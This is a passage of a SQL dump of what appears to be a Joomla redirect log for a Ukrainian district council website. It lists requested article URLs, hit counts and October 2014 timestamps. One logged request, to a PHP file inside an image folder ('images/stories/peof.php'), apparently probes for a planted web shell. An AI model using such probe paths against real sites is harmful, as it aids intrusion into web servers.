00:00:00',301),(7934,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/316-pro-zatverdzhennja-rajonnoi-programi_2','',5,0,'2014-10-11 17:18:31','0000-00-00 00:00:00',301),(7935,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=uk','','','',4,0,'2014-10-11 18:14:49','0000-00-00 00:00:00',301),(7936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-10-11 18:29:51','0000-00-00 00:00:00',301),(7937,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=ru','','','',3,0,'2014-10-11 18:30:19','0000-00-00 00:00:00',301),(7938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-11 18:35:11','0000-00-00 00:00:00',301),(7939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-11 18:37:32','0000-00-00 00:00:00',301),(7940,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1023:-l-28r-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-11 18:44:36','0000-00-00 00:00:00',301),(7941,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1085:2013-09-11-12-15-54&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-11 18:45:08','0000-00-00 00:00:00',301),(7942,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1240:2014-03-17-07-01-32&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-11 19:04:02','0000-00-00 00:00:00',301),(7943,'http://www.malyn-rayrada.org.ua/images/stories/peof.php?baca','','','',5,0,'2014-10-11 19:28:09','0000-00-00 00:00:00',301),(7944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=ru','','','',5,0,'2014-10-11 20:25:46','0000-00-00 00:00:00',301),(7945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-11 20:49:23','0000-00-00 00:00:00',301),(7946,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=ru','','','',3,0,'2014-10-11 20:53:28','0000-00-00 00:00:00',301),(7947,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1122:-1-&lang=uk&layout=default&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1122:-1-&lang=uk&layout=default&page&print=1&tmpl=component&view=article','',3,0,'2014-10-11 20:59:37','0000-00-00 00:00:00',301),(7948,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1031:2013-06-17-06-49-26&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-11 21:07:38','0000-00-00 00:00:00',301),(7949,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=uk&Itemid=','','','',4,0,'2014-10-11 21:11:30','0000-00-00 00:00:00',301),(7950,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=ru&Itemid=0','','','',6,0,'2014-10-11 21:28:05','0000-00-00 00:00:00',301),(7951,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1118:2013-10-25-12-24-30&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-11 21:59:37','0000-00-00 00:00:00',301),(7952,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59&Itemid=107&lang=en','','','',2,0,'2014-10-11 22:11:48','0000-00-00 00:00:00',301),(7953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47:-21022013-&Itemid=86&lang=ru','','','',9,0,'2014-10-11 22:46:49','0000-00-00 00:00:00',301),(7954,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47:-21022013-&Itemid=86&lang=uk','','','',3,0,'2014-10-11 23:21:19','0000-00-00 00:00:00',301),(7955,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-----l90---r&catid=47:--21022013-&Itemid=86&lang=ru','','','',1,0,'2014-10-11 23:44:29','0000-00-00 00:00:00',301),(7956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-----l90---r&catid=47:--21022013-&Itemid=86&lang=uk','','','',2,0,'2014-10-12 00:00:58','0000-00-00 00:00:00',301),(7957,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=uk','','','',2,0,'2014-10-12 00:06:29','0000-00-00 00:00:00',301),(7958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-12 00:12:04','0000-00-00 00:00:00',301),(7959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49:--12042013-&Itemid=88&lang=uk','','','',4,0,'2014-10-12 00:49:33','0000-00-00 00:00:00',301),(7960,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=945:2013-03-04-07-28-58&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-12 00:53:00','0000-00-00 00:00:00',301),(7961,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&Itemid=14&lang=en','','','',6,0,'2014-10-12 00:53:04','0000-00-00 00:00:00',301),(7962,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-12 01:20:51','0000-00-00 00:00:00',301),(7963,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-12 01:20:53','0000-00-00 00:00:00',301),(7964,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32:2011-03-31-12-03-04&Itemid=64&lang=uk','','','',5,0,'2014-10-12 01:23:11','0000-00-00 00:00:00',301),(7965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=en&Itemid=','','','',6,0,'2014-10-12 01:25:52','0000-00-00 00:00:00',301),(7966,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-12 01:31:13','0000-00-00 00:00:00',301),(7967,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-12 01:36:55','0000-00-00 00:00:00',301),(7968,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-12 01:41:12','0000-00-00 00:00:00',301),(7969,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=58:--30042014-&Itemid=105&lang=uk','','','',8,0,'2014-10-12 01:48:08','0000-00-00 00:00:00',301),(7970,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32:2011-03-31-12-03-04&Itemid=64&lang=ru','','','',6,0,'2014-10-12 01:50:11','0000-00-00 00:00:00',301),(7971,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-12 01:58:15','0000-00-00 00:00:00',301),(7972,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1036:2013-06-25-10-02-48&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-12 02:08:24','0000-00-00 00:00:00',301),(7973,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&Itemid=14&lang=en','','','',2,0,'2014-10-12 02:08:37','0000-00-00 00:00:00',301),(7974,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=965:2013-03-14-10-56-03&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-12 02:22:45','0000-00-00 00:00:00',301),(7975,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1211:-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-12 02:22:47','0000-00-00 00:00:00',301),(7976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=36&Itemid=70&lang=ru','','','',9,0,'2014-10-12 02:35:54','0000-00-00 00:00:00',301),(7977,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-12 02:38:45','0000-00-00 00:00:00',301),(7978,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49&Itemid=88&lang=uk','','','',2,0,'2014-10-12 02:42:35','0000-00-00 00:00:00',301),(7979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&Itemid=14&lang=uk','','','',19,0,'2014-10-12 02:48:10','0000-00-00 00:00:00',301),(7980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-10-12 02:51:04','0000-00-00 00:00:00',301),(7981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56&Itemid=97&lang=en','','','',5,0,'2014-10-12 02:51:45','0000-00-00 00:00:00',301),(7982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&Itemid=14&lang=en','','','',7,0,'2014-10-12 02:53:18','0000-00-00 00:00:00',301),(7983,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-10-12 02:54:51','0000-00-00 00:00:00',301),(7984,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-10-12 03:00:32','0000-00-00 00:00:00',301),(7985,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55:--26122013-&Itemid=96&lang=en','','','',3,0,'2014-10-12 03:06:34','0000-00-00 00:00:00',301),(7986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=36&Itemid=70&lang=uk','','','',8,0,'2014-10-12 03:08:45','0000-00-00 00:00:00',301),(7987,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-12 03:13:42','0000-00-00 00:00:00',301),(7988,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-12 03:20:56','0000-00-00 00:00:00',301),(7989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-12 03:21:55','0000-00-00 00:00:00',301),(7990,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=53&Itemid=94&lang=uk','','','',1,0,'2014-10-12 03:44:49','0000-00-00 00:00:00',301),(7991,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21:2010-06-07-09-43-24&Itemid=47&lang=uk','','','',4,0,'2014-10-12 03:52:01','0000-00-00 00:00:00',301),(7992,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1251:2014-03-24-07-11-22&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-12 03:55:24','0000-00-00 00:00:00',301),(7993,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1325:2014-05-29-06-00-31&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-12 03:55:26','0000-00-00 00:00:00',301),(7994,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47&Itemid=86&lang=uk','','','',4,0,'2014-10-12 03:57:19','0000-00-00 00:00:00',301),(7995,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56&Itemid=97&lang=en','','','',2,0,'2014-10-12 04:01:53','0000-00-00 00:00:00',301),(7996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-10-12 04:03:14','0000-00-00 00:00:00',301),(7997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=36&Itemid=70&lang=uk','','','',5,0,'2014-10-12 04:09:33','0000-00-00 00:00:00',301),(7998,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=53:--25102013-&Itemid=94&lang=uk','','','',3,0,'2014-10-12 04:12:32','0000-00-00 00:00:00',301),(7999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:------2014-&catid=36&Itemid=70&lang=en','','','',9,0,'2014-10-12 04:21:20','0000-00-00 00:00:00',301),(8000,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-12 04:48:23','0000-00-00 00:00:00',301),(8001,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=uk','','','',6,0,'2014-10-12 04:58:02','0000-00-00 00:00:00',301),(8002,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=uk','','','',2,0,'2014-10-12 04:58:12','0000-00-00 00:00:00',301),(8003,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-10-12 05:01:00','0000-00-00 00:00:00',301),(8004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-10-12 05:12:17','0000-00-00 00:00:00',301),(8005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=uk','','','',5,0,'2014-10-12 05:16:54','0000-00-00 00:00:00',301),(8006,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-12 05:18:27','0000-00-00 00:00:00',301),(8007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=ru','','','',3,0,'2014-10-12 05:18:58','0000-00-00 00:00:00',301),(8008,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-12 05:19:12','0000-00-00 00:00:00',301),(8009,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1091:2013-09-19-12-13-07&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-12 05:27:54','0000-00-00 00:00:00',301),(8010,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10&Itemid=17&lang=en','','','',2,0,'2014-10-12 05:40:43','0000-00-00 00:00:00',301),(8011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-10-12 05:42:05','0000-00-00 00:00:00',301),(8012,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=ru','','','',2,0,'2014-10-12 05:48:15','0000-00-00 00:00:00',301),(8013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-12 06:01:03','0000-00-00 00:00:00',301),(8014,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=uk','','','',2,0,'2014-10-12 06:04:02','0000-00-00 00:00:00',301),(8015,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=uk','','','',4,0,'2014-10-12 06:04:13','0000-00-00 00:00:00',301),(8016,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=uk','','','',6,0,'2014-10-12 06:04:55','0000-00-00 00:00:00',301),(8017,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=uk','','','',2,0,'2014-10-12 06:05:34','0000-00-00 00:00:00',301),(8018,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=en','','','',5,0,'2014-10-12 06:05:48','0000-00-00 00:00:00',301),(8019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-12 06:09:47','0000-00-00 00:00:00',301),(8020,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47&Itemid=86&lang=ru','','','',2,0,'2014-10-12 06:10:59','0000-00-00 00:00:00',301),(8021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-12 06:23:59','0000-00-00 00:00:00',301),(8022,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-10-12 06:26:31','0000-00-00 00:00:00',301),(8023,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=en&Itemid=','','','',5,0,'2014-10-12 06:30:33','0000-00-00 00:00:00',301),(8024,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=uk','','','',2,0,'2014-10-12 06:32:31','0000-00-00 00:00:00',301),(8025,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47:-21022013-&Itemid=86&lang=ru','','','',1,0,'2014-10-12 06:41:37','0000-00-00 00:00:00',301),(8026,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=ru','','','',4,0,'2014-10-12 06:43:41','0000-00-00 00:00:00',301),(8027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=uk&Itemid=','','','',6,0,'2014-10-12 06:51:57','0000-00-00 00:00:00',301),(8028,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-12 06:59:02','0000-00-00 00:00:00',301),(8029,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=uk&Itemid=','','','',4,0,'2014-10-12 07:01:12','0000-00-00 00:00:00',301),(8030,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=uk','','','',2,0,'2014-10-12 07:01:47','0000-00-00 00:00:00',301),(8031,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=uk','','','',3,0,'2014-10-12 07:02:40','0000-00-00 00:00:00',301),(8032,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=en','','','',3,0,'2014-10-12 07:03:21','0000-00-00 00:00:00',301),(8033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-12 07:06:04','0000-00-00 00:00:00',301),(8034,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',2,0,'2014-10-12 07:07:14','0000-00-00 00:00:00',301),(8035,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-12 07:20:22','0000-00-00 00:00:00',301),(8036,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=ru','','','',2,0,'2014-10-12 07:20:48','0000-00-00 00:00:00',301),(8037,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-12 07:21:41','0000-00-00 00:00:00',301),(8038,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-12 07:23:36','0000-00-00 00:00:00',301),(8039,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=937:---------------------------21122012--l--&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-12 07:25:32','0000-00-00 00:00:00',301),(8040,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=ru&Itemid=','','','',4,0,'2014-10-12 07:30:12','0000-00-00 00:00:00',301),(8041,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-12 07:38:29','0000-00-00 00:00:00',301),(8042,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-12 07:39:00','0000-00-00 00:00:00',301),(8043,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=uk&Itemid=','','','',3,0,'2014-10-12 07:39:53','0000-00-00 00:00:00',301),(8044,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-10-12 07:44:49','0000-00-00 00:00:00',301),(8045,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-12 07:46:46','0000-00-00 00:00:00',301),(8046,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=uk&Itemid=','','','',4,0,'2014-10-12 07:49:19','0000-00-00 00:00:00',301),(8047,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-12 07:58:22','0000-00-00 00:00:00',301),(8048,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=ru&Itemid=','','','',4,0,'2014-10-12 08:00:50','0000-00-00 00:00:00',301),(8049,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-12 08:16:02','0000-00-00 00:00:00',301),(8050,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-12 08:24:46','0000-00-00 00:00:00',301),(8051,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=36&Itemid=70&lang=en','','','',2,0,'2014-10-12 08:57:58','0000-00-00 00:00:00',301),(8052,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-12 08:59:10','0000-00-00 00:00:00',301),(8053,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-12 09:00:42','0000-00-00 00:00:00',301),(8054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',8,0,'2014-10-12 09:00:52','0000-00-00 00:00:00',301),(8055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-12 09:01:41','0000-00-00 00:00:00',301),(8056,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59&Itemid=107&lang=en','','','',4,0,'2014-10-12 09:05:06','0000-00-00 00:00:00',301),(8057,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=en','','','',5,0,'2014-10-12 09:30:15','0000-00-00 00:00:00',301),(8058,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=en&Itemid=','','','',5,0,'2014-10-12 09:36:49','0000-00-00 00:00:00',301),(8059,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=944:-l-r-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-12 09:53:58','0000-00-00 00:00:00',301),(8060,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-12 09:55:36','0000-00-00 00:00:00',301),(8061,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-12 10:18:20','0000-00-00 00:00:00',301),(8062,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1137:2013-11-15-13-07-04&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-12 10:21:23','0000-00-00 00:00:00',301),(8063,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32&Itemid=64&lang=en','','','',2,0,'2014-10-12 10:45:55','0000-00-00 00:00:00',301),(8064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:------2013-&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-10-12 10:46:38','0000-00-00 00:00:00',301),(8065,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:------2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-12 10:49:20','0000-00-00 00:00:00',301),(8066,'http://malyn-rayrada.org.ua/user/','','','',2,0,'2014-10-12 10:52:35','0000-00-00 00:00:00',301),(8067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-------2012-&catid=46:--21122012&Itemid=85&lang=uk','','','',2,0,'2014-10-12 11:02:33','0000-00-00 00:00:00',301),(8068,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32:2011-03-31-12-03-04&Itemid=64&lang=en','','','',3,0,'2014-10-12 11:06:03','0000-00-00 00:00:00',301),(8069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',12,0,'2014-10-12 11:18:16','0000-00-00 00:00:00',301),(8070,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10&Itemid=17&lang=en','','','',1,0,'2014-10-12 11:48:32','0000-00-00 00:00:00',301),(8071,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=ru&Itemid=','','','',9,0,'2014-10-12 11:50:34','0000-00-00 00:00:00',301),(8072,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',2,0,'2014-10-12 12:16:55','0000-00-00 00:00:00',301),(8073,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=931:2013-02-21-09-14-48&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-12 13:22:55','0000-00-00 00:00:00',301),(8074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=ru','','','',6,0,'2014-10-12 13:25:51','0000-00-00 